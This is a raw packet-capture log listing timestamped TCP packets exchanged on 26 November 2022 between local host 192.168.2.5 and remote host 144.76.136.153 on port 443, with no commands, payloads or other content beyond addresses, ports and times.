Nov 26, 2022 11:17:50.789331913 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.789375067 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.789474010 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.789474010 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.789534092 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.792795897 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.837435007 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.837474108 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.837605000 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.837605000 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.837654114 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.838104010 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.905271053 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.905329943 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.905447960 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.905447960 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.905503035 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.905577898 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.949619055 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.949697971 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.949892998 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.949892998 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.949944973 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.950006962 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.998316050 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.998374939 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.998570919 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.998636961 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.998754978 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.049295902 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.049352884 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.049452066 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.049505949 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.049537897 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.052611113 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.096771955 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.096856117 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.096905947 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.096966982 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.097001076 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.097071886 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.150367975 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.150435925 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.150640965 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.150640965 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.150707006 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.150780916 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.218017101 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.218103886 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.218213081 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.218276024 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.218316078 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.218360901 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.270065069 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.270153999 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.270271063 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.270318985 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.270354033 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.270421028 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.329319000 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.329395056 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.329489946 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.329547882 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.329583883 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.329627037 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.375994921 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.376087904 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.376163006 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.376223087 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.376255989 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.376296997 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.426805019 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.426872969 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.426948071 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.427001953 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.427042007 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.427067041 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.478104115 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.478173018 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.478256941 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.478256941 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.478308916 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.478358984 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.542084932 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.542150974 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.542217016 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.542263031 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.542318106 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.542318106 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.595622063 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.595691919 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.595818043 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.595896959 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.595928907 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.595973015 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.645891905 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.645971060 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.646014929 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.646061897 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.646091938 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.646133900 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.703296900 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.703383923 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.703500986 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.703545094 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.703572989 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.703600883 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.754416943 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.754467010 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.754568100 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.754609108 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.754652023 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.754679918 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.814770937 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.814812899 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.814945936 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.815007925 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.815041065 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.815068007 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.864613056 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.864660978 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.864794970 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.864866018 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.864907026 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.864932060 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.910454035 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.910525084 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.910588980 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.910640001 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.910669088 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.910690069 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.944040060 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.944113016 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.944215059 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.944276094 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.944312096 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.944341898 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.976311922 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.976386070 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.976475954 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.976537943 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:51.976573944 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:51.976602077 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.004993916 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.005062103 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.005172014 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.005244017 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.005285025 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.005325079 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.038736105 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.038805008 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.038934946 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.038934946 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.038995028 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.039071083 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.064357042 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.064423084 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.064491034 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.064552069 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.064589024 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.064626932 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.089358091 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.089425087 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.089500904 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.089551926 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.089586973 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.089701891 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.116252899 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.116312981 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.116543055 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.116543055 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.116601944 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.116697073 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.143371105 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.143433094 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.143563032 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.143640041 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.143706083 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.143706083 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.169375896 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.169435978 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.169590950 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.169590950 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.169642925 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.169713020 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.196249008 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.196312904 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.196419001 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.196455956 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.196482897 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.196532011 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.230093002 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.230154037 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.230297089 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.230334044 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.230364084 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.230397940 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.256573915 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.256640911 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.256762981 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.256814003 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.256901979 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.284610033 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.284670115 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.284801006 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.284801960 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.284852028 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.285269022 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.312952042 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.313014030 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.313149929 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.313149929 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.313194990 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.313267946 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.340915918 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.340974092 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.341110945 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.341155052 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.341216087 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.341216087 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.367537022 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.367598057 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.367769957 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.367769957 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.367819071 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.367886066 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.390053034 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.390113115 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.390197992 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.390234947 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.390260935 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.390343904 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.405278921 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.405335903 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.405417919 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.405452967 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.405478001 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.405545950 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.426573992 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.426632881 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.426729918 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.426764965 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.426788092 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.426821947 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.447617054 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.447679996 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.447755098 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.447786093 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.447809935 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.447841883 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.468844891 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.468909025 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.468986988 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.469029903 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.469052076 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.469089031 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.499207020 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.499273062 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.499440908 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.499440908 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.499480009 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.499541044 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.524075031 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.524142981 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.524235010 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.524235010 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.524267912 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.524336100 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.571918011 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.571984053 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.572130919 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.572170019 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.572206020 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.572228909 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.582559109 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.582623005 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.582725048 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.582799911 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.582822084 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.582870960 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.603997946 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.604059935 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.604176998 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.604223013 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.604244947 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.604285002 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.631978989 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.632042885 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.632138968 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.632174015 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.632193089 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.632226944 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.647615910 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.647675991 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.647743940 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.647788048 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.647818089 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.647844076 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.678107977 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.678149939 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.678364992 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.678364992 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.678419113 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.678582907 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.699301958 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.699342012 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.699481964 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.699481964 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.699521065 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.699573994 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.723381996 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.723418951 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.723543882 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.723543882 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.723577023 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.723673105 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.740051031 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.740098000 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.740183115 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.740219116 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.740237951 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.740274906 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.757757902 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.757797003 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.757886887 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.757924080 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.757947922 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.757978916 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.775224924 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.775270939 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.775360107 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.775394917 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.775415897 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.775476933 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.798692942 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.798738956 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.798949003 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.798949957 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.798993111 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.799063921 CET	49709	443	192.168.2.5	144.76.136.153
